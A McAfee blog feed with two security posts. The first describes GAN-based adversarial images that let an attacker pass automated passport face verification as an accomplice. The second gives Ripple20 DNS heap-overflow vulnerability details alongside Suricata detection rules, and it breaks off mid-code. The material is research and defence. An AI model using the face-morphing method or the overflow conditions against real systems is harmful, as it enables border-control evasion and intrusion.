McAfee Blogs (https://www.mcafee.com/blogs), Securing Tomorrow. Today.

Dopple-ganging up on Facial Recognition Systems
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dopple-ganging-up-on-facial-recognition-systems/
Wed, 05 Aug 2020 16:01:05 +0000


Co-authored with Jesse Chick, OSU Senior and Former McAfee Intern, Primary Researcher.

Special thanks to Dr. Catherine Huang, McAfee Advanced Analytics Team
Special thanks to Kyle Baldes, Former McAfee Intern

“Face” the Facts

There are 7.6 Billion people in the world. That’s a huge number! In fact, if we all stood shoulder to shoulder on the equator, the number of people in the world would wrap around the earth over 86 times! That’s just the number of living people today; even adding in the history of all people for all time, you will never find two identical human faces. In fact, in even some of the most similar faces recorded (not including twins) it is quite easy to discern multiple differences. This seems almost impossible; it’s just a face, right? Two eyes, a nose, a mouth, ears, eyebrows and potentially other facial hair. Surely, we would have run into identical unrelated humans by this point. Turns out, there’s SO much more to the human face than this which can be more subtle than we often consider; forehead size, shape of the jaw, position of the ears, structure of the nose, and thousands more extremely minute details.

You may be questioning the significance of this detail as it relates to McAfee, or vulnerability research. Today, we’ll explore some work undertaken by McAfee Advanced Threat Research (ATR) in the context of data science and security; specifically, we looked at facial recognition systems and whether they were more, or less susceptible to error than we as human beings.

Look carefully at the four images below; can you spot which of these is fake and which are real?

StyleGAN images

The answer may surprise you; all four images are completely fake – they are 100% computer-generated, and not just parts of different people creatively superimposed. An expert system known as StyleGAN generated each of these, and millions more, with varying degrees of photorealism, from scratch.

This impressive technology rests equally on revolutions in data science and on emerging compute technology that runs faster and cheaper at a scale we’ve never seen before. It is enabling impressive innovations in data science and image generation or recognition, and can be done in real time or near real time. Some of the most practical applications for this are in the field of facial recognition; simply put, the ability for a computer system to determine whether two images or other media represent the same person or not. The earliest computer facial recognition technology dates back to the 1960s, but until recently, it has either been cost-ineffective, prone to false positives or false negatives, or too slow and inefficient for the intended purpose.

The advancements in technology and breakthroughs in Artificial Intelligence and Machine Learning have enabled several novel applications for facial recognition. First and foremost, it can be used as a highly reliable authentication mechanism; an outstanding example of this is the iPhone. Beginning with the iPhone X in 2017, facial recognition was the new de facto standard for authenticating a user to their mobile device. While Apple uses advanced features such as depth to map the target face, many other mobile devices have implemented more standard methods based on the features of the target face itself; things we as humans see as well, including placement of eyes, width of the nose, and other features that in combination can accurately identify a single user. More simplistic and standard methods such as these may inherently suffer from security limitations relative to more advanced capabilities, such as the 3D camera capture. In a way, this is the whole point; the added complexity of depth information is what makes pixel-manipulation attacks impossible.

Another emerging use case for facial recognition systems is for law enforcement. In 2019, the Metropolitan Police in London announced the rollout of a network of cameras designed to aid police in automating the identification of criminals or missing persons. While widely controversial, the UK is not alone in this initiative; other major cities have piloted or implemented variants of facial recognition with or without the general population’s consent. In China, many of the trains and bus systems leverage facial recognition to identify and authenticate passengers as they board or unboard. Shopping centers and schools across the country are increasingly deploying similar technology.

More recently, in light of racial profiling and racial bias demonstrated repeatedly in facial recognition AI, IBM announced that it would eliminate its facial recognition programs given the way it could be used in law enforcement. Since then, many other major players in the facial recognition business have suspended or eliminated their facial recognition programs. This may be at least partially based on a high profile “false positive” case in which authorities errantly based an arrest of an individual on an incorrect facial recognition match of a black man named Robert Williams. The case is known as the country’s first wrongful arrest directly resulting from facial recognition technology.

Facial recognition has some obvious benefits of course, and this recent article details the use of facial recognition technology in China to track down and reunite a family many years after an abduction. Despite this, it remains a highly polarizing issue with significant privacy concerns, and may require significant further development to reduce some of the inherent flaws.

Live Facial Recognition for Passport Validation

Our next use case for facial recognition may hit closer to home than you realize. Multiple airports, including many in the United States, have deployed facial recognition systems to aid or replace human interaction for passport and identity verification. In fact, I was able to experience one of these myself in the Atlanta airport in 2019. It was far from ready, but travellers can expect to see continued rollouts of this across the country. In fact, based on the global impact COVID-19 has had on travel and sanitization, we are observing an unprecedented rush to implement touchless solutions such as biometrics. This is of course being done from a responsibility standpoint, but also from an airline and airport profitability perspective. If these two entities can’t convince travelers that their travel experience is low-risk, many voluntary travelers will opt to wait until this assurance is more solid. This article expands on the impact Coronavirus is having on the fledgling market use of passport facial recognition, providing specific insight into Delta and United Airlines’ rapid expansion of the tech into new airports immediately, and further testing and integration in many countries around the world. While this push may result in less physical contact and fewer infections, it may also have the side-effect of exponentially increasing the attack surface of a new target.

The concept of passport control via facial recognition is quite simple. A camera takes a live video and/or photos of your face, and a verification service compares it to an already-existing photo of you, collected earlier. This could be from a passport or a number of other sources such as the Department of Homeland Security database. The “live” photo is most likely processed into a similar format (image size, type of image) as the target photo, and compared. If it matches, the passport holder is authenticated. If not, an alternate source will be checked by a human operator, including boarding passes and forms of ID.

As vulnerability researchers, we need to be able to look at how things work; both the intended method of operation as well as any oversights. As we reflected on this growing technology and the extremely critical decisions it enabled, we considered whether flaws in the underlying system could be leveraged to bypass the target facial recognition systems. More specifically, we wanted to know if we could create “adversarial images” in a passport-style format, that would be incorrectly classified as a targeted individual. (As an aside, we performed related attacks in both digital and physical mediums against image recognition systems, including research we released on the MobilEye camera deployed in certain Tesla vehicles.)

The conceptual attack scenario here is simple. We’ll refer to our attacker as Subject A, and he is on the “no-fly” list – if a live photo or video of him matches a stored passport image, he’ll immediately be refused boarding and flagged, likely for arrest. We’ll assume he’s never submitted a passport photo. Subject A (AKA Jesse), is working together with Subject B (AKA Steve), the accomplice, who is helping him to bypass this system. Jesse is an expert in model hacking and generates a fake image of Steve through a system he builds (much more on this to come). The image has to look like Steve when it’s submitted to the government, but needs to verify Jesse as the same person as the adversarial fake “Steve” in the passport photo. As long as a passport photo system classifies a live photo of Jesse as the target fake image, he’ll be able to bypass the facial recognition.

If this sounds far-fetched to you, it doesn’t to the German government. Recent policy in Germany included verbiage to explicitly disallow morphed or computer-generated combined photos. While the techniques discussed in this link are closely related to this, the approach, techniques and artifacts created in our work vary widely. For example, the concepts of face morphing in general are not novel ideas anymore; yet in our research, we use a more advanced, deep learning-based morphing approach, which is categorically different from the more primitive “weighted averaging” face morphing approach.

Over the course of 6 months, McAfee ATR researcher and intern Jesse Chick studied state-of-the-art machine learning algorithms, read and adopted industry papers, and worked closely with McAfee’s Advanced Analytics team to develop a novel approach to defeating facial recognition systems. To date, the research has progressed through white box and gray box attacks with high levels of success – we hope to inspire or collaborate with other researchers on black box attacks and demonstrate these findings against real world targets such as passport verification systems with the hopes of improving them.

The Method to the Madness

The term GAN is an increasingly-recognized acronym in the data science field. It stands for Generative Adversarial Network and represents a novel concept using one or more “generators” working in tandem with one or more “discriminators.” While this isn’t a data science paper and I won’t go into great detail on GAN, it will be beneficial to understand the concept at a high level. You can think of GAN as a combination of an art critic and an art forger. An art critic must be capable of determining whether a piece of art is real or forged, and of what quality the art is. The forger of course, is simply trying to create fake art that looks as much like the original as possible, to fool the critic. Over time, the forger may outwit the critic, and at other times the opposite may hold true, yet ultimately, over the long run, they will force each other to improve and adapt their methods. In this scenario, the forger is the “generator” and the art critic is the “discriminator.” This concept is analogous to GAN in that the generator and discriminator are both working together and also opposing each other – as the generator creates an image of a face, for example, the discriminator determines whether the image generated actually looks like a face, or if it looks like something else. It rejects the output if it is not satisfied, and the process starts over. This is repeated in the training phase for as long of a time as it takes for the discriminator to be convinced that the generator’s product is high enough quality to “meet the bar.”

One such implementation we saw earlier, StyleGAN, uses these exact properties to generate the photorealistic faces shown above. In fact, the research team tested StyleGAN, but determined it was not aligned with the task we set out to achieve: generating photorealistic faces, but also being able to easily implement an additional step in face verification. More specifically, its sophisticated and niche architecture would have been highly difficult to harness successfully for our purpose of clever face-morphing. For this reason, we opted to go with a relatively new but powerful GAN framework known as CycleGAN.

CycleGAN

CycleGAN is a GAN framework that was released in a paper in 2017. It represents a GAN methodology that uses two generators and two discriminators, and in its most basic sense, is responsible for translating one image to another through the use of GAN.

Image of zebras translated to horses via CycleGAN

There are some subtle but powerful details related to the CycleGAN infrastructure. We won’t go into depth on these, but one important concept is that CycleGAN uses higher level features to translate between images. Instead of taking random “noise” or “pixels” in the way StyleGAN translates into images, this model uses more significant features of the image for translation (shape of head, eye placement, body size, etc…). This works very well for human faces, despite the paper not specifically calling out human facial translation as a strength.

FaceNet and InceptionResnetV1

While CycleGAN is a novel use of the GAN model, in and of itself it has been used for image-to-image translation numerous times. Our facial recognition application created the need to extend this single model with an image verification system. This is where FaceNet came into play. The team realized that not only would our model need to create adversarial images that were photorealistic, it would also need them to be verified as the original subject. More on this shortly. FaceNet is a face recognition architecture that was developed by Google in 2015, and was and perhaps still is considered state of the art in its ability to accurately classify faces. It uses a concept called facial embeddings to determine mathematical distances between two faces in a vector space. For the programmers or math experts, 512-dimensional space is used, to be precise, and each embedding is a 512-dimensional list or vector. To the lay person, the less similar the high-level facial features are, the further apart the facial embeddings are. Conversely, the more similar the facial features, the closer together these faces are plotted. This concept is ideal for our use of facial recognition, given FaceNet operates against high-level features of the face rather than individual pixels, for example. This is a central concept and a key differentiator between our research and “shallow” adversarial image creation à la the more traditionally used FGSM, JSMA, etc. Creating an attack that operates at the level of human-understandable features is where this research breaks new ground.

One of the top reasons for FaceNet’s popularity is that it uses a pre-trained model trained on a data set of hundreds of millions of facial images. This training was performed using a well-known academic/industry-standard dataset, and these results are readily available for comparison. Furthermore, it achieved a very high published accuracy (99.63%) when used on a set of 13,000 random face images from a benchmark data set known as LFW (Labeled Faces in the Wild). In our own in-house evaluation testing, our accuracy results were closer to 95%.

Ultimately, given our need to start with a white box to understand the architecture, the solution we chose was a combination of CycleGAN and an open source FaceNet variant architecture known as InceptionResnet version 1. The ResNet family of deep neural networks uses learned filters, known as convolutions, to extract high-level information from visual data. In other words, the role of deep learning in face recognition is to transform an abstract feature from the image domain, i.e. a subject’s identity, into a domain of vectors (AKA embeddings) such that they can be reasoned about mathematically. The outputs of two images depicting the same subject should be mapped to nearby points in the output space, and images depicting different subjects to two very different regions. It should be noted that the success or failure of our attack is contingent on its ability to manipulate the distance between these face embeddings. To be clear, FaceNet is the pipeline consisting of data pre-processing, Inception ResNet V1, and data separation via a learned distance threshold.
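The last step of that pipeline, separating genuine from impostor pairs with a learned distance threshold, is the decision the rest of this research hinges on, so here is an added worked example of it. This is example code written for this article, not FaceNet’s, the InceptionResnet implementation’s or McAfee’s code. Real embeddings are not available offline, so the identities and captured frames are constructed stand-ins (random 512-dimensional unit vectors plus small per-dimension noise, at an assumed noise level); the function names are likewise this example’s own.

```python
import math
import random

EMBEDDING_DIM = 512  # FaceNet embeddings are 512-dimensional vectors


def l2_normalize(vec):
    """Scale a vector to unit length; FaceNet compares embeddings on the unit hypersphere."""
    norm = math.sqrt(sum(x * x for x in vec))
    return [x / norm for x in vec]


def embedding_distance(a, b):
    """Euclidean distance between two unit-length embeddings: 0 for identical, ~1.41 for unrelated."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def is_same_person(a, b, threshold):
    """The verification decision: accept only when the two embeddings are closer than the threshold."""
    return embedding_distance(a, b) < threshold


def learn_threshold(genuine, impostor):
    """Choose the distance threshold that maximises accuracy on labelled genuine/impostor distances.

    Candidates are the midpoints between neighbouring observed distances, so the chosen
    boundary sits between the two classes rather than on a sample.
    """
    points = sorted(genuine + impostor)
    candidates = [(points[i] + points[i + 1]) / 2 for i in range(len(points) - 1)]
    best_threshold, best_accuracy = None, -1.0
    for t in candidates:
        correct = sum(d < t for d in genuine) + sum(d >= t for d in impostor)
        accuracy = correct / (len(genuine) + len(impostor))
        if accuracy > best_accuracy:
            best_threshold, best_accuracy = t, accuracy
    return best_threshold, best_accuracy


# --- Constructed data: stand-ins for FaceNet output, not real embeddings ---

def synthetic_identity(rng):
    """A subject's 'true' embedding: a random unit vector (constructed for this example)."""
    return l2_normalize([rng.gauss(0.0, 1.0) for _ in range(EMBEDDING_DIM)])


def synthetic_capture(identity, rng, noise=0.01):
    """One captured frame of a subject: the identity plus small per-dimension noise (assumed level)."""
    return l2_normalize([x + rng.gauss(0.0, noise) for x in identity])


def run_verification_demo(seed=7, subjects=6, captures=5):
    """Build genuine and impostor pairs, learn the threshold, and report the separation."""
    rng = random.Random(seed)
    identities = [synthetic_identity(rng) for _ in range(subjects)]
    samples = [[synthetic_capture(ident, rng) for _ in range(captures)] for ident in identities]

    genuine, impostor = [], []
    for i, caps in enumerate(samples):
        for k in range(captures):
            for m in range(k + 1, captures):          # same subject, different frames
                genuine.append(embedding_distance(caps[k], caps[m]))
            for j in range(i + 1, subjects):          # different subjects, same frame index
                impostor.append(embedding_distance(caps[k], samples[j][k]))

    threshold, accuracy = learn_threshold(genuine, impostor)
    return {
        "threshold": threshold,
        "accuracy": accuracy,
        "max_genuine": max(genuine),
        "min_impostor": min(impostor),
        # a live frame checked against the stored identity: accepted only within the threshold
        "frame_vs_own_identity": is_same_person(samples[0][0], identities[0], threshold),
    }


if __name__ == "__main__":
    for key, value in run_verification_demo().items():
        print(f"{key}: {value}")
```

The gap between the largest genuine distance and the smallest impostor distance is the margin a deployment actually relies on: the in-house 95% versus the published 99.63% above is a statement about how much of that margin survives on a new camera and population, and any image whose embedding lands inside the threshold for two different people is accepted as both. Measuring that margin on your own enrolment data, rather than trusting the published figure, is the first check a verifier of such a system should run.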

Training

Whoever has the most data wins. This truism is especially relevant in the context of machine learning. We knew we would need a large enough data set to accurately train the attack generation model, but we guessed that it would be smaller than in many other use cases. This is because our goal was simply to take two people, subject A (Jesse) and subject B (Steve) below, and minimize the “distance” between the two face embeddings produced when they are input into FaceNet, while preserving a misclassification in either direction. In other words, Jesse needed to look like Jesse in his passport photo, and yet be classified as Steve, and vice versa. We’ll describe facial embeddings and visualizations in detail shortly.

The training was done on a set of 1500 images of each of us, captured from live video as stills. We provided multiple expressions and facial gestures that would enrich the training data and accurately represent someone attempting to take a valid passport photo.

The research team then integrated the CycleGAN + FaceNet architecture and began to train the model.

As you can see from the images below, the initial output from the generator is very rough – these certainly look like human beings (sort of), but they’re not easily identifiable and of course have extremely obvious perturbations, otherwise known as “artifacts.”

However, as we progress through training over dozens of cycles, or epochs, a few things are becoming more visually apparent. The faces begin to clean up some of the abnormalities while simultaneously blending features of both subject A and subject B. The (somewhat frightening) results look something like this:

Progressing even further in the training epochs, and the discriminator is starting to become more satisfied with the generator’s output. Yes, we’ve got some detail to clean up, but the image is starting to look much more like subject B.

A couple hundred training epochs in, and we are producing candidates that would meet the bar for this application; they would pass as valid passport photos.

Fake image of Subject B

Remember that with each iteration through this training process, the results are systematically fed into the facial recognition neural network and classified as Subject A or Subject B. This is essential as any photo that doesn’t “properly misclassify” as the other doesn’t meet one of the primary objectives and must be rejected. It is also a novel approach as there are very few research projects which combine a GAN and an additional neural network in a cohesive and iterative approach like this.

We can see visually above that the faces being generated at this point are becoming real enough to convince human beings that they are not computer-generated. At the same time, let’s look behind the curtain and see some facial embedding visualizations which may help clarify how this is actually working.

To further understand facial embeddings, we can use the following images to visualize the concept. First, we have the images used for both training and generation of images. In other words, it contains real images from our data set and fake (adversarial) generated images as shown below:

Model Images (Training – Real_A & Real_B) – Generated (Fake_B & Fake_A)

This set of images is just one epoch of the model in action – given the highly realistic fake images generated here, it is, not surprisingly, a later epoch in the model evaluation.

To view these images as mathematical embeddings, we can use a visualization representing them on a multidimensional plane, which can be rotated to show the distance between them. It’s much easier to see that this model represents a cluster of “Real A” and “Fake B” on one side, and a separate cluster of “Real B” and “Fake A” on the other. This is the ideal attack scenario as it clearly shows how the model will confuse the fake image of the accomplice with the real image of the attacker, our ultimate test.

White Box and Gray Box Application

With much of machine learning, the model must be both effectively trained as well as able to reproduce and replicate results in future applications. For example, consider a food image classifier; its job being to correctly identify and label the type of food it sees in an image. It must have a massive training set so that it recognizes that a French Fry is different than a crab leg, but it also must be able to reproduce that classification on images of food it’s never seen before with a very high accuracy. Our model is somewhat different in that it is trained specifically on two people only (the adversary and the accomplice), and its job is done ahead of time during training. In other words, once we’ve generated a photorealistic image of the attacker that is classified as the accomplice, the model’s job is done. One important caveat is that it must work reliably to both correctly identify people and differentiate people, much like facial recognition would operate in the real world.

The theory behind this is based on the concept of transferability; if the models and features chosen in the development phase (called white box, with full access to the code and knowledge of the internal state of the model and pre-trained parameters) are similar enough to the real-world model and features (black box, no access to code or classifier) an attack will reliably transfer – even if the underlying model architecture is vastly different. This is truly an incredible concept for many people, as it seems like an attacker would need to understand every feature, every line of code, every input and output, to predict how a model will classify “adversarial input.” After all, that’s how classical software security works for the most part. By either directly reading or reverse engineering a piece of code, an attacker can figure out the precise input to trigger a bug. With model hacking (often called adversarial machine learning), we can develop attacks in a lab and transfer them to black box systems. This work, however, will take us through white box and gray box attacks, with possible future work focusing on black box attacks against facial recognition.

As mentioned earlier, a white box attack is one that is developed with full access to the underlying model – either because the researcher developed the model, or they are using an open source architecture. In our case, we did both to identify the ideal combination discussed above, integrating CycleGAN with various open source facial recognition models. The real Google FaceNet is proprietary, but it has been effectively reproduced by researchers as open source frameworks that achieve very similar results, hence our use of Inception Resnet v1. We call these versions of the model “gray box” because they are somewhere in the middle of white box and black box.

To take the concepts above from theory to the real world, we need to implement a physical system that emulates a passport scanner. Without access to the actual target system, we’ll simply use an RGB camera, such as the external one you might see on desktops in a home or office. The underlying camera is likely quite similar to the technology used by a passport photo camera. There’s some guesswork needed to determine what the passport camera is doing, so we take some educated liberties. The first thing to do is programmatically capture every individual frame from the live video and save them in memory for the duration of their use. After that, we apply some image transformations, scaling them to a smaller size and appropriate resolution of a passport-style photo. Finally, we pass each frame to the underlying pretrained model we built and ask it to determine whether the face it is analyzing is Subject A (the attacker), or Subject B (the accomplice). The model has been trained on enough images and variations of both that even changes in posture, position, hair style and more will still cause a misclassification. It’s worth noting that in this attack method, the attacker and accomplice are working together and would likely attempt to look as similar as possible to the original images in the data set the model is trained on, as it would increase the overall misclassification confidence.

The Demos

The following demo videos demonstrate this attack using our gray box model. Let’s introduce the 3 players in these videos. In all three, Steve is the attacker now, Sam is our random test person, and Jesse is our accomplice. The first will show the positive test.

Positive Test:

This uses a real, non-generated image on the right side of the screen of Steve (now acting as our attacker). Our random test person (Sam), first stands in front of the live “passport verification camera” and is compared against the real image of Steve. They should of course be classified as different. Now Steve stands in front of the camera and the model correctly identifies him against his picture, taken from the original and unaltered data set. This proves the system can correctly identify Steve as himself.

Negative Test:

Next is the negative test, where the system tests Sam against a real photo of Jesse. He is correctly classified as different, as expected. Then Steve stands in front of the system and confirms the negative test as well, showing that the model correctly differentiates people in non-adversarial conditions.

Adversarial Test:

Finally, in the third video, Sam is evaluated against an adversarial, or fake image of Jesse, generated by our model. Since Sam was not part of the CycleGAN training set designed to cause misclassification, he is correctly shown as different again. Lastly, our attacker Steve stands in front of the live camera and is correctly misclassified as Jesse (now the accomplice). Because the model was trained for either Jesse or Steve to be the adversarial image, in this case we chose Jesse as the fake/adversarial image.

If a passport scanner were to replace a human being completely in this scenario, it would believe it had just correctly validated that the attacker was the same person stored in the passport database as the accomplice. Given the accomplice is not on a no-fly list and does not have any other restrictions, the attacker can bypass this essential verification step and board the plane. It’s worth noting that a human being would likely spot the difference between the accomplice and attacker, but this research is based on the inherent risks associated with reliance on AI and ML alone, without providing defense-in-depth or external validation, such as a human being to validate.

Positive Test Video – Confirming Ability to Recognize a Person as Himself

Negative Test Video – Confirming Ability to Tell People Apart

Adversarial Test Video – Confirming Ability to Misclassify with Adversarial Image

What Have we Learned?

Biometrics are an increasingly relied-upon technology to authenticate or verify individuals and are effectively replacing passwords and other potentially unreliable authentication methods in many cases. However, the reliance on automated systems and machine learning without considering the inherent security flaws present in the mysterious internal mechanics of face-recognition models could provide cyber criminals unique capabilities to bypass critical systems such as automated passport enforcement. To our knowledge, our approach to this research represents the first-of-its-kind application of model hacking and facial recognition. By leveraging the power of data science and security research, we look to work closely with vendors and implementors of these critical systems to design security from the ground up, closing the gaps that weaken these systems. As a call to action, we look to the community for a standard by which we can reason formally about the reliability of machine learning systems in the presence of adversarial samples. Such standards exist in many verticals of computer security, including cryptography, protocols, wireless radio frequency and many more. If we are going to continue to hand off critical tasks like authentication to a black box, we had better have a framework for determining acceptable bounds for its resiliency and performance under adverse conditions.

For more information on research efforts by McAfee Advanced Threat Research, please follow our blog or visit our website.

Ripple20 Critical Vulnerabilities – Detection Logic and Signatures
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-critical-vulnerabilities-detection-logic-and-signatures/
Wed, 05 Aug 2020 13:00:05 +0000


This document has been prepared by McAfee Advanced Threat Research in collaboration with JSOF who discovered and responsibly disclosed the vulnerabilities. It is intended to serve as a joint research effort to produce valuable insights for network administrators and security personnel, looking to further understand these vulnerabilities to defend against exploitation. The signatures produced here should be thoroughly considered and vetted in staging environments prior to being used in production and may benefit from specific tuning to the target deployment. There are technical limitations to this work, including the fact that more complex methods of detection might be required to detect these vulnerabilities. For example, multiple layers of encapsulation may obfuscate the exploitation of the flaws and increase the difficulty of detection.

We have also provided packet captures taken from the vulnerability Proof-of-Concepts as artifacts for testing and deployment of either the signatures below or customized signatures based on the detection logic. Signatures and Lua Scripts are located on ATR’s Github page, as well as inline and in the appendix of this document respectively.

As of this morning (August 5th), JSOF has presented additional technical detail and exploitation analysis at BlackHat 2020, on the two most critical vulnerabilities in DNS.

The information provided herein is subject to change without notice, and is provided “AS IS”, with all faults, without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance and for use at your own risk. Additionally, we cannot guarantee any performance or efficacy benchmarks for any of the signatures.

Integer Overflow in tfDnsExpLabelLength Leading to Heap Overflow and RCE

CVE: CVE-2020-11901 (Variant 1)
CVSS: 9
Protocol(s): DNS over UDP (and likely DNS over TCP)
Port(s): 53

Vulnerability description:
In the Treck stack, the length of a DNS name is computed by the function tfDnsExpLabelLength. A bug exists in this function: the computation is performed using an unsigned short, making it possible to overflow the computed value with a specially constructed DNS response packet. Since tfDnsExpLabelLength computes the full length of a DNS name after decompression, an overflow can be induced with a DNS packet far smaller than 2^16 bytes. In some code paths, tfGetRawBuffer is called shortly after tfDnsExpLabelLength, allocating a buffer on the heap where the DNS name will be stored, sized by the value tfDnsExpLabelLength computed, thus leading to a heap overflow and potential RCE.
While newer versions of the Treck stack will stop copying the DNS name into the buffer as soon as a character that isn’t alphanumeric or a hyphen is reached, older versions do not have this restriction and further use predictable transaction IDs for DNS queries, making this vulnerability easier to exploit.

Limitations or special considerations for detection:

Ideally, detection logic for this vulnerability would involve independently computing the uncompressed length of all DNS names contained within incoming DNS responses. Unfortunately, this may be computationally expensive for a device to perform for every incoming DNS response, especially since each one may contain many DNS names. Instead, we must rely on a combination of heuristics.

Furthermore, it is currently unclear whether exercising this vulnerability is possible when using EDNS(0) or DNS over TCP. We recommend assuming it is possible for the purposes of implementing detection logic.  During our testing, an inconsistency in how Suricata handled DNS over TCP was discovered – in some cases it was correctly identified as DNS traffic and in other cases, it was not. Consequently, two rules have been created to determine the size of DNS over TCP traffic. The second rule uses the TCP primitive instead of the DNS primitive; however, the second rule will only be evaluated if not flagged by the first rule.

Because the Suricata rule in dns_invalid_size.rules uses the DNS responses’ EDNS UDP length, which may be controlled by the attacker, a second upper limit of 4096 bytes is enforced.

Recommended detection criteria:

  • The device must be capable of processing DNS traffic and matching responses to their corresponding requests.
  • The device must be capable of identifying individual DNS names within individual DNS packets.
  • The device should flag any DNS responses whose size exceeds what is “expected”. The expected size depends on the type of DNS packet sent:
    • For DNS over TCP, the size should not exceed the value specified in the first two bytes of the TCP payload.
    • For DNS over UDP with EDNS(0), the size should not exceed the value negotiated in the request, which is specified in the CLASS field of the OPT RR, if present.
    • For DNS over UDP without EDNS(0), the size should not exceed 512 bytes.
    • These are all checked in dns_invalid_size.rules, which invokes either dns_size.lua or dns_tcp_size.lua for the logic.
  • The device should flag DNS responses containing DNS names exceeding 255 bytes (prior to decompression).
    • This is checked in dns_invalid_name.rules, which invokes dns_invalid_name.lua for the logic.
  • The device should flag DNS responses containing DNS names comprised of characters besides a-z, A-Z, 0-9, “-”, “_”, and “*”.
    • This is also checked in dns_invalid_name.rules, which invokes dns_invalid_name.lua for the logic.
  • The device should flag DNS responses containing a large number of DNS compression pointers, particularly pointers one after the other. The specific tolerance will depend on the network.
    • The device should count all labels starting with the bits 0b10, 0b01, or 0b11 against this pointer total, as vulnerable versions of the Treck stack (incorrectly) classify all labels where the first two bits aren’t 0b00 as compression pointers. In the Lua script, we treat any value above 63 (0x3F) as a pointer for this reason, as any value in that range will have at least one of these bits set.
    • The specific thresholds were set to 40 total pointers in a single DNS packet or 4 consecutive pointers for our implementation of this rule. These values were chosen since they did not seem to trigger any false positives in a very large test PCAP but should be altered as needed to suit typical traffic for the network the rule will be deployed on. The test for consecutive pointers is especially useful since each domain name should only ever have one pointer (at the very end), meaning we should never be seeing many pointers in a row in normal traffic.
    • This is implemented in dns_heap_overflow_variant_1.lua, which is invoked by dns_heap_overflow.rules.
  • Implementation of the detection logic above has been split up amongst several Suricata rule files since only the pointer counting logic is specific to this vulnerability. Detection of exploits leveraging this vulnerability are enhanced with the addition of the DNS layer size check, domain name compressed length check, and domain name character check implemented in the other rules, but these are considered to be “helper” signatures and flagging one of these does not necessarily indicate an exploitation attempt for this specific vulnerability.

False positive conditions (signatures detecting non-malicious traffic):

Networks expecting non-malicious traffic containing DNS names using non-alphanumeric characters or an abnormally large number of DNS compression pointers may generate false positives. Unfortunately, checking for pointers in only the domain name fields is insufficient, as a malicious packet could use a compression pointer that points to an arbitrary offset within said packet, so our rule instead checks every byte of the DNS layer. Consequently, Treck’s overly liberal classification of DNS compression pointers means that our rule will often misclassify unrelated bytes in the DNS payload as pointers.

In our testing, we ran into false positives with domain names containing spaces or things like “https://”. Per the RFCs, characters such as “:” and “/” should not be present in domain names but may show up from time to time in real, non-malicious traffic. The list of acceptable characters should be expanded as needed for the targeted network to avoid excessive false positives. That being said, keeping the list of acceptable characters as small as possible will make it more difficult to sneak in shellcode to leverage one of the Ripple20 DNS vulnerabilities.

False positives on the DNS size rules may occur when DNS over TCP is used if Suricata does not properly classify the packet as a DNS packet – something that has occurred multiple times during our testing. This would cause the second size check to occur, which assumes that all traffic over port 53 is DNS traffic and processes the payload accordingly. As a result, any non-DNS traffic on TCP port 53 may cause false positives in this specific case. It is recommended the port number in the rule be adjusted for any network where a different protocol is expected over port 53.

Fragmentation of DNS traffic over TCP may also introduce false positives. If the streams are not properly reconstructed at the time the rules execute on the DNS payload, byte offsets utilized in the attached Lua scripts could analyze incorrect data. Fragmentation in DNS response packets is not common on a standard network unless MTU values have been set particularly low. Each rule should be evaluated independently prior to use in production based on specific network requirements and conditions.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives are more likely as this detection logic relies on heuristics due to computation of the uncompressed DNS name length being too computationally expensive. Carefully constructed malicious packets may be able to circumvent the suggested pointer limitations and still trigger the vulnerability.

Signature(s):

dns_invalid_size.rules:

alert dns any any -> any any (msg:"DNS packet too large"; flow:to_client; flowbits:set,flagged; lua:dns_size.lua; sid:2020119014; rev:1;)

Lua script (dns_size.lua) can be found in Appendix A

alert tcp any 53 -> any any (msg:"DNS over TCP packet too large"; flow:to_client,no_frag; flowbits:isnotset,flagged; lua:dns_tcp_size.lua; sid:2020119015; rev:1;)

Lua script (dns_tcp_size.lua) can be found in Appendix A

dns_invalid_name.rules:

alert dns any any -> any any (flow:to_client; msg:"DNS response contains invalid domain name"; lua:dns_invalid_name.lua; sid:2020119013; rev:1;)

Lua script (dns_invalid_name.lua) can be found in Appendix A

dns_heap_overflow.rules:

# Variant 1

alert dns any any -> any any (flow:to_client; msg:"Potential DNS heap overflow exploit (CVE-2020-11901)"; lua:dns_heap_overflow_variant_1.lua; sid:2020119011; rev:1;)

Lua script (dns_heap_overflow_variant_1.lua) can be found in Appendix A

RDATA Length Mismatch in DNS CNAME Records Causes Heap Overflow

CVE: CVE-2020-11901 (Variant 2)
CVSS: 9
Protocol(s): DNS/UDP (and likely DNS/TCP)
Port(s): 53

Vulnerability description:

In some versions of the Treck stack, a vulnerability exists in the way the stack processes DNS responses containing CNAME records. In such records, the length of the buffer allocated to store the DNS name is taken from the RDLENGTH field, while the data written is the full, decompressed domain name, terminating only at a null byte. As a result, if the size of the decompressed domain name specified in RDATA exceeds the provided RDLENGTH in a CNAME record, the excess is written past the end of the allocated buffer, resulting in a heap overflow and potential RCE.

Limitations or special considerations for detection:

Although exploitation of this vulnerability has been confirmed using malicious DNS over UDP packets, it has not been tested using DNS over TCP and it is unclear if such packets would exercise the same vulnerable code path. Until this can be confirmed, detection logic should assume both vectors are vulnerable.

Recommended detection criteria:

  • The device must be capable of processing incoming DNS responses.
  • The device must be capable of identifying CNAME records within DNS responses.
  • The device should flag all DNS responses where the actual size of the RDATA field for a CNAME record exceeds the value specified in the same record’s RDLENGTH field.
    • In this case, the “actual size” corresponds to how vulnerable versions of the Treck stack compute the RDATA length, which involves adding up the size of every label until either null byte, a DNS compression pointer, or the end of the payload is encountered. The Treck stack will follow and decompress the pointer that terminates the domain name, if present, but the script does not as this computation is simply too expensive, as mentioned previously.
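The checks described for both CVE-2020-11901 variants above, as an added Python example that is not the McAfee ATR Lua scripts: a name walker that stops at the first compression pointer (as the post says the Treck-style RDATA length computation does), the 255-byte and character allow-list checks, the Variant 1 pointer-run heuristic with the post's 40-total / 4-consecutive thresholds, and the Variant 2 CNAME RDLENGTH comparison. The pointer count is a simplification of the post's every-byte scan: it steps over the answer sections in label mode, counting any length byte above 0x3F as a pointer, which keeps Treck's over-broad pointer classification while avoiding false hits on plain ASCII. All sample responses are constructed inline.

```python
"""Heuristic detections for the two CVE-2020-11901 DNS variants.
Constructed example; thresholds and allow-list follow the post."""
import struct

MAX_COMPRESSED_NAME = 255          # bytes, prior to decompression
MAX_POINTERS_TOTAL = 40            # per DNS message (tune per network)
MAX_POINTERS_CONSECUTIVE = 4
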